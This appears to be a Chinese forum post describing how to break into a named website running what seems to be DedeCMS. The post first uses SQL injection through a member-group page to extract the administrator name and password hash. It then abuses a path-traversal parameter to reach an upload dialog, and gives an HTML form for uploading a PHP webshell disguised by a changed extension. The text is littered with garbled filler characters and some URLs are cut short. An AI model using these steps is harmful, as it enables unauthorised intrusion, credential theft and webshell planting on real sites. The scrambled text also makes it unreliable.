①注入漏洞。; p% z/ B' A+ N8 _4 d* j
这站 http://www.political-security.com/( j' F* ? k+ V# f. Z% t
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,7 g) J0 l% w$ x n
www.political-security.com/data/mysql_error_trace.inc 爆后台
: j x: }$ P" G6 [然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。" n/ ~/ T8 j! T& n. [) s; G
然后写上语句
1 i& v* S7 a2 f8 e+ E/ Y查看管理员帐号2 S z- o* `2 ^2 `& G
http://www.political-security.co ... &membergroup=@`
5 t- l* {- g0 J. Y# V u9 S1 M7 U+ U5 q( U
admin 7 K7 x, r' F& J: I9 Z5 C. N+ q
9 E0 R# y! V8 m. o% n8 o
查看管理员密码
- U$ Z5 L0 T# g+ f/ G# i1 i http://www.political-security.co ... &membergroup=@`
8 G. I5 z; ]! F1 f" |4 e
) `+ {6 l7 M' G! I* F8d29b1ef9f8c5a5af429
5 @6 p' C3 v& x I6 u% |+ p9 W9 n' F) L% r% P; H9 w- W
查看管理员密码# y2 i0 ]6 R) o R- T- |+ N9 f1 Z1 k
7 B6 o" `3 L0 w& a' K6 B( m; g
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD52 P$ ^ q. Y+ M
9 a1 @& {7 K/ j+ [4 z3 J
8d2
9 E: k( ?/ w/ ]9b1ef9f8c5a5af42
- K$ D& [$ {/ _99 Y& ?7 {5 j. o
0 o. ]4 m# }' t8 Acmd5没解出来 只好测试第二个方法
+ _+ S4 ]& I- S! D2 q" y. t3 Z0 V6 G) m8 M* M, K4 v( z5 N; v
. t M7 ^4 T/ s3 q7 p7 r②上传漏洞:
8 M/ P+ ]& J! F+ z, N O$ Y r- q/ Z
只要登陆会员中心,然后访问页面链接
3 ~$ N9 t5 B U$ y: h2 f“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”5 y+ N7 P" R) x- q+ c8 Z
3 A5 }0 O8 i: k
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 k# {% N+ _( |; P, R/ i9 V$ y( V3 }4 N8 G
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
) n9 M- z* t( s# v" [8 ^6 @ g% T. A' H
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
) X6 R6 n) n, \" z或者
6 R( l1 G6 H: D: _即可上传成功 |